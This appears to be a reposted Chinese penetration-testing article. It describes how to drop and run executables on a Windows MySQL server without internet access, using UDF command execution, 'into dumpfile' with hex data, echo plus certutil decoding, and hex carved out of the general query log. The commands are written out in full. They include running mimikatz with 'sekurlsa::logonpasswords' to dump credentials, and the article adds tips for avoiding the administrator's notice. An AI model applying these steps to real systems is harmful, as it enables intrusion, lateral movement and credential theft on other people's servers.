文章来源:先知社区(海鸥i)
原文地址:https://xz.aliyun.com/t/10960
0x01 前言
之前偶尔会遇到站库分离数据库不出网&没有Webshell的情况,只有一个可以执行命令的shell,这种情况下如果想进行横向只能通过数据库来落地我们的工具。
注:文中只是为了演示数据库如何落地exe,可能部分环境过于理想化,在实战中很难遇到。
0x02 模拟环境
模拟环境:Windows+Mysql 5.7.26,web目录没有写入权限,但是对lib/plugin有写入权限,可以使用UDF执行命令。
0x03 into dumpfile
1.1.1 导出exe
复制exe文件的16进制,然后执行。
select unhex("exe文件的16进制") into dumpfile "\\路径\\文件名.exe"
导出后的文件可以正常执行
这里落地了一个mimikat.exe,然后执行
select sys_eval('C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\M.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\res1.txt"')
执行完毕后可以使用windows的more、type或者mysql的Load_file函数查看执行结果
如果运行了一个exe程序,但是没有给他退出的命令或者是他自己不会终止退出。例如我直接运行mimikatz.exe没有给参数传入,那么他会在目标服务器直接弹一个黑窗,一直卡在这,直到程序被终结。
这种情况可以在桌面手动关闭,也可以通过shell关闭。
select sys_eval('tasklist /svc |findstr "进程名.exe"')
将结果进行16解码即可得到进程id,再Kill掉就好了。
导出的文件,不能是已经存在的文件,否则会报错。
导出路径中的"\"为两个,否则会转义。
使用findstr查找进程的时候,要使用双引号包裹进程名。
正常执行程序的时候,会秒弹一个黑窗然后退出,使用暂时没找到解决办法。尽量避免管理员在线的时候执行exe,使用query user可查看管理员是否在线。
0x04 into outfile
into outfile会转义换行符,导致exe无法正常执行。
0x05 echo导出
1.3.1 全部写入
select sys_eval("echo exe_hex >> c:\\users\\admin\\desktop\aaa.txt && certutil -decodehex c:\\users\\admin\\desktop\aaa.txt c:\\users\\admin\\desktop\aaa.exe"
百度了一下windows命令行最大长度为8191,16进制长度是113898,做了一个小实验来验证百度到的答案:
复制所有16进制到cmd,echo 所有16进制>> 11.txt。因为有长度限制,只会复制一部分到cmd。查看cmd中最后的exe-hex 08B45F4890424E85D在全部exe-hex中的位置-8176,加上echo空格>>空格11.txt刚好8190个字节。
0x06 日志
常见Getshell日志类型
show variables like 'general_log'; #查看日志是否开启
set global general_log=on; #开启日志功能
show variables like 'general_log_file'; #看看日志文件保存位置
set global general_log_file='log_path'; #设置日志文件保存位置
powershell -c "&{$b=[System.IO.File]::ReadAllBytes('日志文件');set-content -value $b[开始位置..结束位置] -encoding byte -path '保存路径';}"
使用[System.IO.File]::ReadAllBytes读取日志全部内容,再使用set-content筛选出我们的exe-hex。
1. 这里尽量先设置好日志存储路径再开启日志记录,日志会少一点。
3. powershell导出exe-hex的时候会覆盖源文件
0x07 思考
以下几个点是在实验过程中&偶然灵光一现感觉可行的思路
大都是使用certuil解码?有没有其他的解码方式?(已解决)
没找到其他windows自带的程序可以解码,之后想到可以python解码,由此想到其他支持在命令行执行单行代码的语言php、perl等。其他的不支持在命令行执行代码的语言,可以再使用上面的方法导出该语言对应的解码代码,再去调用执行进行解码。
下面是python3的一句话hex解码,其他语言也大致类似思路,这里就不演示啦。
python -c "import binascii;text=open('res.exe','ab');text.write(binascii.a2b_hex(open('exe-hex.txt').read()))"
outfile既然导出二进制会增加转义、换行,如果可以使用powershell、编程语言将其再过滤,是不是也可以用。(未解决)
最后日志使用powershell可以获取到exe-hex,如果没有powershell感觉使用编程语言也可以匹配出来。(已解决)
python -c "import re;import binascii;z=re.findall('(4D5A.*?6500)\"',open('log.log').read());text=open('res1.exe','ab');text.write(binascii.a2b_hex(z[0]))"
感觉echo导出方式这个也适用于不出网对web目录没写入权限的命令执行。
0x08 总结
0x09 参考链接
Mysql日志介绍-通用日志
https://blog.csdn.net/leshami/article/details/39779225
Mysql通用日志Getshell
https://www.cnblogs.com/KHZ521/p/14961303.html
Windows命令行长度限制
https://blog.csdn.net/u011250186/article/details/108409562
python十六进制转换为字符串
https://blog.csdn.net/weixin_39914107/article/details/111429294
如侵权请私聊公众号删文
多一个点在看多一条小鱼干